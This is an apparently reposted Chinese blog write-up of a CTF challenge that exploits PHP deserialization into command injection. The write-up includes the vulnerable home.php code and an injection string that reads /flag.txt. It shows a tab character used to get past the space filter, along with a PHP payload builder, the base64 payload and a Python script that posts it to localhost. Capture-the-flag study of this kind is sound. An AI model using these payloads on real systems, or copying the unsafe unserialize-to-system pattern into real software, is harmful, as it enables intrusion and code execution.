CTF中PHP反序列化和命令注入的一次简单利用

最新推荐文章于 2023-02-09 22:20:40 发布
最新推荐文章于 2023-02-09 22:20:40 发布
阅读量1.3k 收藏 2
点赞数
文章标签: php 网络 操作系统
原文链接:http://www.cnblogs.com/kevinbruce656/p/11198236.html
版权

代码来自第六届防灾科技学院网络安全技能大赛,侵删。

目标

获取Linux服务器根目录下的flag

代码
/*home.php*/
class home{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }

    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 

    function ping($host){
        system("ping -c 2 $host");
    }
    function waf($str){
        $str=str_replace(' ','',$str);
        return $str;
    }

    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf(trim(mysql_escape_string($v)));
        }
    }   
}
$a=@$_POST['a'];
@unserialize(base64_decode($a));
分析

该PHP文件只接收一个base64编码的POST参数,将其解码后会进行反序列化操作。

在执行__wakeup()方法之后,会触发__construct()方法进行初始化,该方法没有可以利用的地方。

当所有的操作执行完毕之后,需要释放序列化的对象,触发__destruct()魔术方法。该方法只允许执行类中的ping方法,并会将args的值作为ping方法host参数。

ping中存在可控参数$host,且调用了system函数,这里便可以作为一个利用点。可以构造一个特殊的payload:

ping -c 2 127.0.0.1|cat /flag.txt
#不唯一
利用

整理上面的思路可知,若想得到flag最终要构造出如下的args字符串:

127.0.0.1|cat /flag.txt

而waf等方法又过滤掉了空格,这里可以通过将空格换成Tab来绕过该限制。
同时还要注意method必须为ping。

这里得到了构造payload的最终PHP脚本:

class home{
    
    private $method;
    private $args; 
}
    $a = new home("ping",array('127.0.0.1|cat   /flag.txt'));
    $b = serialize($a);
    echo base64_encode($b);

payload

Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czoyNDoiMTI3LjAuMC4xfGNhdCAJL2ZsYWcudHh0Ijt9fQ==

发送payload得到flag

import requests
data ={"a":"Tzo0OiJob21lIjoyOntzOjEyOiIAaG9tZQBtZXRob2QiO3M6NDoicGluZyI7czoxMDoiAGhvbWUAYXJncyI7YToxOntpOjA7czoyNDoiMTI3LjAuMC4xfGNhdCAJL2ZsYWcudHh0Ijt9fQ=="}
url = 'http://localhost/common/home.php'
r = requests.post(url,data=data)
print(r.text)
#result:flag{glzjin_wants_a_girl_friend}

转载于:https://www.cnblogs.com/kevinbruce656/p/11198236.html

Surenon
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
从一道ctfphp反序列化漏洞的应用场景
HuaZi_Myth的博客
10-17 753
目录 0x00 first 0x01 我打我自己之---序列化问题 0x02 [0CTF 2016] piapiapia 0x00 first 前几天joomla爆出个反序列化漏洞,原因是因为对序列化后的字符进行过滤,导致用户可控字符溢出,从而控制序列化内容,配合对象注入导致RCE。刚好今天刷CTF题时遇到了一个类似的场景,感觉很有意思,故有本文。...
php 反序列注入,CTFPHP反序列化命令注入一次简单利用
weixin_31796803的博客
04-07 706
代码来自第六届防灾科技学院网络安全技能大赛,侵删。php目标获取Linux服务器根目录下的flagpython代码/*home.php*/class home{private $method;private $args;function __construct($method, $args) {$this->method = $method;$this->args = $args;}f...
PHP反序列化漏洞&网鼎杯ctf实例
weixin_44769042的博客
09-22 1122
漏洞简介 php反序列化漏洞,又叫php对象注入漏洞。 简单来讲,就是在php反序列化的时候,反序列化的内容是用户可控,那么恶意用户就可以构造特定序列化内容的代码,通过unserialize()函数进行特定的反序列化操作,并且程序的某处存在一些敏感操作是写在类的,那么就可以通过这段恶意代码,达到执行攻击者想要的操作。 漏洞形成原因 漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。 什么是序.
2018领航杯awd简单复现
plant1234的博客
12-19 3632
首先这里需要搭建一个cms的平台得到: 利用D盾进行漏洞扫描得到: 5级的eval后门漏洞 可以看到这里有一个5级的eval后门漏洞,我们查看文件得到源码: 这是一句话后门,我们利用一下这个后门得到: 这里能cat flag 修补增加过滤或者删除漏洞 2级的fwrite审计: 利用seay工具进行代码审计: 源码: 可以发现这是一个日志记录,但是它把记录的日志都写入到了 /var/www/html/log.php文件,这就造成文件写入漏洞 我们利用这个log1.php用get的方式写一个<?
php函数重载 和call_user_func和call_user_func_array详解
云烟阁
01-03 2137
php函数call_user_func和call_user_func_array详解 call_user_func函数类似于一种特别的调用函数的方法,使用方法如下:  function a($b,$c) { echo $b; echo $c; } call_user_func('a', "111","222"); call_user_func('a', "333","444");
Web安全攻防世界04 unseping(江苏工匠杯)
weixin_42789937的博客
12-01 1716
Web安全攻防世界04 unseping(江苏工匠杯)参考大佬们的WP有所补充,时隔多月再次整理博文,修复了原来不明白的点,内容小白友好~
bfengj#CTF#thinkphp5.0.24反序列化rce1
07-25
thinkphp5.0.24反序列化rceModel是抽象类protected $append = [];// $value值,作为call函数引用的第二变量p
php代码-ctf payload 第九题 反序列化 do you know robot
07-15
CTF(Capture The Flag)竞赛,编程者经常面临各种挑战,其反序列化”是一种常见的安全漏洞利用方式。第九题的标题暗示我们需要理解并利用PHP反序列化机制来解决这个问题。PHP是一种广泛使用的服务器端...
tsqlphpunserialize:在 T-SQL 反序列化 PHP 序列化数据
06-13
tsqlphpunserialize 在 T-SQL 反序列化 PHP 序列化数据最初发布在 Stack Exchange 上: : noredirect=1# 我正在尝试从 Magento 订单提取礼品卡代码。 其他一些代码使用 Magento API 从 Magento 检索订单信息作为...
反序列化漏洞学习
Wawyw's Blog
06-28 459
1、序列化与反序列化概述 什么是序列化与反序列化? 序列化(serialize):将对象转换为字符串 反序列化(unserialize):将字符串转换为对象 序列化机制出现的意义 php程序为了保存和转储对象,提供了序列化的方法,php序列化是为了在程序运行的过程对对象进行转储而产生的。序列化可以将对象转换成字符串,但仅保留对象里的成员变量,不保留函数方法。 简单例子 <?php class Students{ public $name,$age; public functio
记录复现一下第一次awd
qq_63928796的博客
02-09 577
之前没打过awd,这次学长组织了一场awd娱乐赛,两个web一个pwn,还有一个黑盒,只会web,第一次啥也不会瞎打,被打烂了,不会写脚本,手交flag的感觉真“不错”,感觉awd还是比ctf好多了(虽然啥也不会),浅浅复现一下。
江苏工匠杯-unseping&序列化,正则绕过(全网最简单的wp)
cike_y
12-02 3899
in_array, 检查数组是否存在某个值,如果method的变量为"ping",那么将执行下一行call_user_func_array()—调用回调函数(把一个数组参数作为回调函数的参数,第二个数组为被传入的索引数组),也就是说method为ping时,那么它的索引数组就是args变量,同时传入args变量也必须是数组才能执行语句。看到网上和官方wp解法极为复杂,其实要八进制编码等等,仔细思考方法不止一种呢,此篇是我刷php反序列化笔记,有什么不懂的可以私信我,或者留言,看到的我都会认真回复。
又是一题反序列化了解一下???
weixin_30462049的博客
11-08 141
题目内容如下: 1 <?php 2 error_reporting(0); 3 class come{ 4 private $method; 5 private $args; 6 function __construct($method, $args) { 7 $this->method = ...
php反序列化漏洞学习笔记
T19er的博客
07-09 976
0x01序列化与反序列化概述 PHP序列化是将一个对象、数组、字符串等转化为字节流便于传输 PHP反序列化是将序列化之后的字节流还原成对象、字符、数组等。但是PHP序列化是不会保存对象的方法。 0x02 magic魔术方法总结 php面向对象变成,有一类函数叫做magic function,魔术函数,这些函数是以__(双下划线)开头的,他们是一些当依照某些规则实例化类或者调用某些函数的时候会自动...
2017百越杯反序列化writeup
weixin_30865427的博客
08-19 446
去年的了,之前也有研究过。只是因为感觉PHP反序列化挺好玩的所以就再研究了一遍。总之感觉反序列化漏洞挺好玩的。 题目代码: 1 <?php 2 3 class home{ 4 5 private $method; 6 private $args; 7 function __construct($method, $...
PHP源码unserialize函数引发的漏洞分析
cnbird's blog
03-07 1567
0×01 unserialize函数的概念 首先看下官方给出的解释:unserialize() 对单一的已序列化的变量进行操作,将其转换回 PHP 的值。返回的是转换之后的值,可为 integer、float、string、array 或 object。如果传递的字符串不可解序列化,则返回 FALSE。若被解序列化的变量是一个对象,在成功地重新构造对象之后,PHP 会自动地试图去调用 __wak
php反序列化注入,php关于反序列化对象注入漏洞
weixin_42497828的博客
03-09 338
php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。本文主要和大家分享php关于反序列化对象注入漏洞详解,希望能帮助到大家。分析php基础serialize 把一个对象转成字符串形式, 可以用于保存unserialize 把serialize序列化后的字符串变成一个对象php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的,比如 __...
php 反序列化 对象注入漏洞
苟有恒,必有三更眠,五更起。
03-10 621
简介 php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险。 分析 php基础 serialize 把一个对象转成字符串形式, 可以用于保存 unserialize 把serialize序列化后的字符串变成一个对象 php类可能会包含一些特殊的函数叫magic函数,magic函数命名是以符号__开头的, 比如 __construct,...
call_user_func_array php7 替换,call_user_func_array的一个奇怪的问题。
weixin_34259909的博客
04-02 255
问题已经被具体定义了,已经抽取成文件,文件下载链接。精简问题我封装了一个类,这个类(A)有个方法(f)。这个方法A::f通过call_user_func_array函数调用了另一个类(B)对象(b_obj)的方法(f),实际参数通过在A::f()调用func_get_args()给call_user_func_array。可结果在B::f()收到的参数被嵌套了,不明白的话,具体的情况见下面的...
ctf php反序列化
最新发布
06-07
CTFPHP反序列化攻击主要针对使用PHP的Web应用程序,攻击者可以利用PHP反序列化漏洞来执行恶意代码或者获取敏感信息。攻击者通常会通过构造恶意的序列化数据来触发漏洞,从而实现攻击的目的。 在实际攻击,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值